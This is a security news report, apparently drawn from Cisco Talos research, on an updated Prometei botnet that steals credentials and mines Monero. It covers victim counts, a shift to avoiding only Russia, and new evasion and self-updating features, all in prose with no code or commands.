A new version of a botnet malware called “Prometei” has been spotted that comes with the improved infrastructure components and capabilities that allow to automate processes and make forensic analysis more difficult.

First observed in 2016, Prometei is a modular botnet with worm-like capabilities that steals credentials and deploys the Monero cryptocurrency miner.

According to a new report from Cisco’s Talos threat research team, Prometei has infected more than 10,000 victims worldwide since November 2022, with a majority of the victims reported in Brazil, Indonesia, and Turkey.

“Talos observed Prometei’s cryptocurrency mining and credential theft activity to be financially motivated and geographically indiscriminate. Its infections are likely opportunistic, targeting vulnerable entities in all regions and industry verticals to support a higher yield of harvested credentials and mining of the Monero cryptocurrency,” the researchers said.

Interestingly, the new version of the malware is designed to avoid attacking Russia, suggesting that the bot’s targeting may have been influenced by the war in Ukraine.

“Prior to Russia’s invasion of Ukraine, the actor avoided targeting Russia and many of its border states, whereas now, they only avoid targeting Russia. This may indicate a desire to limit the infection of and/or communication to any Russian hosts by the botnet’s author, and that previously excluded border states are now fair game,” Cisco Talos noted.

An analysis of the botnet’s execution chain revealed that the Prometei operators have made modifications that automate component and infrastructure updating, complicate defenders’ analysis, and further entrench the actor on victim machines. The execution chain and subsequent actions performed by the botnet were initiated by a malicious PowerShell command that downloaded the primary listening and execution module (sqhost.exe).

The researchers also observed previously undocumented functionality, including an alternative C&C domain generating algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache Webserver with a web shell that’s deployed onto victim hosts, improving the overall technical capabilities of the botnet.